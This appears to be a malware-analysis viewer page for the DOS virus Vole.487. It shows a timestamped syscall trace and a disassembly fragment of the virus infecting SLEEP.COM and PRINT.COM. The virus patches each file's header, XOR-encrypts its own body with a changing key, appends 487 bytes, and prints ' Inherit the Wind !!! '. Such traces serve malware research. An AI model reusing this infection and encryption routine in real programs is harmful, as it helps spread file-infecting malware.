Sample viewer

vx.netlux.org/Virus.DOS.Vole.487

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:53:48.005523987Z 26 PC: 12a8c | Set disk transfer address
2018-12-17T22:53:48.007478709Z 37 PC: 12a9a | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:53:48.009660447Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:53:48.011097707Z 78 PC: 12aea | Find first file
2018-12-17T22:53:48.017947083Z 61 PC: 12bbb | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:53:48.027076151Z 63 PC: 12bca | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:53:48.034170498Z 66 PC: 12bd9 | Move file pointer
2018-12-17T22:53:48.035971711Z 66 PC: 12be8 | Move file pointer
2018-12-17T22:53:48.038792409Z 64 PC: 12bf4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:53:48.041835816Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:53:48.043627181Z 44 PC: 12c04 | Get time 0x12c04: mov byte ptr [bp + 0x1e7], dl
0x12c08: call 0x12c1e
0x12c0b: mov ah, 0x40
0x12c0d: mov cx, 0x1e7
0x12c10: lea dx, word ptr [bp + 6]
0x12c14: int 0x21
0x12c16: call 0x12c1e
0x12c19: mov ah, 0x3e
0x12c1b: int 0x21
0x12c1d: ret
0x12c1e: lea si, word ptr [bp + 0x33]
0x12c22: mov cx, 0x195
0x12c25: xor byte ptr [si], 0
0x12c28: inc si
0x12c29: dec cx
0x12c2a: jne 0x12c25
0x12c2c: ret
0x12c2d: add word ptr [bx], di
0x12c2f: aas
0x12c30: aas
2018-12-17T22:53:48.06101907Z 64 PC: 12c16 | Write file or device (Write 487 bytes on handle 5)
2018-12-17T22:53:48.078870783Z 62 PC: 12c1d | Close file
2018-12-17T22:53:48.094346874Z 79 PC: 12aea | Find next file
2018-12-17T22:53:48.099372453Z 61 PC: 12bbb | Open file (Filename = 'PRINT.COM')
2018-12-17T22:53:48.118407108Z 63 PC: 12bca | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:53:48.13092398Z 66 PC: 12bd9 | Move file pointer
2018-12-17T22:53:48.133505469Z 66 PC: 12be8 | Move file pointer
2018-12-17T22:53:48.135882715Z 64 PC: 12bf4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:53:48.13943098Z 66 PC: 12c00 | Move file pointer
2018-12-17T22:53:48.141707526Z 44 PC: 12c04 | Get time 0x12c04: mov byte ptr [bp + 0x1e7], dl
0x12c08: call 0x12c1e
0x12c0b: mov ah, 0x40
0x12c0d: mov cx, 0x1e7
0x12c10: lea dx, word ptr [bp + 6]
0x12c14: int 0x21
0x12c16: call 0x12c1e
0x12c19: mov ah, 0x3e
0x12c1b: int 0x21
0x12c1d: ret
0x12c1e: lea si, word ptr [bp + 0x33]
0x12c22: mov cx, 0x195
0x12c25: xor byte ptr [si], 0x42
0x12c28: inc si
0x12c29: dec cx
0x12c2a: jne 0x12c25
0x12c2c: ret
0x12c2d: add word ptr [bx], di
0x12c2f: aas
0x12c30: aas
2018-12-17T22:53:48.146720172Z 64 PC: 12c16 | Write file or device (Write 487 bytes on handle 5)
2018-12-17T22:53:48.156315716Z 62 PC: 12c1d | Close file
2018-12-17T22:53:48.165963719Z 26 PC: 12b04 | Set disk transfer address
2018-12-17T22:53:48.16860493Z 9 PC: 12b10 | Display string (Could not find end pointer)
2018-12-17T22:53:48.179478155Z 9 PC: 12b25 | Display string (String= ' Inherit the Wind !!! ')